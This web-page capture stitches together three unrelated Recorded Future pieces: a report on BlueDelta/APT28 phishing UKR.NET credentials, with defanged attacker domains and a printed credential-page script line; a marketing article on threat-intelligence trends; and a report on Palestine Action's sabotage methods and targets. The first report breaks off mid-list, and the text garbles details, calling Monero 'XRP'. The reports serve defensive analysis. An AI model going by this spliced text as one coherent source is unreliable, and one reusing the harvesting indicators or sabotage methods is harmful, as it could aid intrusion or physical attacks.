Smarter, Faster Security Decisions

Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.

By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.

These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.

Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.

The analysis cut-off date for this report was July 30, 2025

Executive Summary

Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.

Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.

BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.

Key Findings

• BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
• The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
• BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
• Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
• The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.

Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)

The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.

Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)

The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.

At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.

The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.

BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.

var respIP=$.getJSON('hxxps://httpbin[.]org/ip');

Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)

Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.

On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.

The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.

In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.

Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.

On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.

Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)

Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)

During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.

Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages

(Source: Recorded Future)

Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:

• doads[.]org
• in[.]run
• t[.]ly
• tiny[.]cc
• tinyurl[.]com
• linkcuts[.]com

In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:

Introduction

The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.

The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.

This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.

Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.

Key Trends Driving Threat Intelligence Evolution

There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.

• Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
• Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
• Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
• Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).

Challenges Holding Team Backs Today

Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.

• Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
• Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
• Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
• Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.

These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.

Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned

In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).

Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.

Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.

Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.

Implications for 2026 Security Budgets and Investments

As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.

One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.

Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.

Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.

That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.

Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.

Charting the Course to 2026

Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.

By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.

So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.

With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.

Executive Summary

Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.

Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.

Key Findings

• Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
• Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
• The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
• The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
• In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.

Palestine Action: History and Terrorism Designation

Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.

Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”

The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.

Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)

The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.

Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.

However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”

Figure 2: Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)

Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.

Palestine Action’s Tactics, Techniques, Procedures, and Targets

Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.

Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.

Direct Action TTPs

Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:

• Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
• Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
• Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
• Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
  • If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
  • If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.

Vandalism

Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.

These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”

Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)

Obstruction

Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.

Figure 4: Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source: BBC)

Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.

Figure 5: Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)

Sabotage

Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.

The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.

Figure 6: Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)

Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.

Targets

Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.

As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.

Palestine Action’s Global Network

Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.

We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.

Table 1: Classification of Palestine Action global network groups (Source: Insikt Group)

Franchise: Palestine Action Italia/Palestina Libera (Italy)

Figure 7: Palestine Action Italia logo (Source: Palestine Action Italia)

Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.

The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.

Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:

